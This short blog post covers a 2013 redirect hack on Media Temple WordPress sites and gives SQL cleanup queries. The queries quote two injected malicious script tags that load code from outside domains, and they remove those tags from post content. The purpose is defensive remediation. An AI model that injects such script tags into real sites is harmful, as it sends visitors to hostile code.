It looks like Media Temple WordPress installs have been hit with a WordPress Redirect Exploit (404 link removed 2013/10/11). We got hit here at DigWP.com, but have cleaned things up and are taking steps to prevent it from happening again. Here is what Media Temple knows so far:
- Visitors viewing posts on your blog may be redirected to a third-party site. This may be a site already blocked by Google.
- Visitors may also be forwarded to the domain googlesearch.com, which has already been disabled.
They provide steps for clearing things up (404 link removed 2016/11/28), but it doesn't look like the entry-point or source of this hack is known at this point.
To clean this up asap, backup your database and run the following SQL queries:
UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', ''); UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');
And remember to change the query prefix from
wp_ to your custom prefix.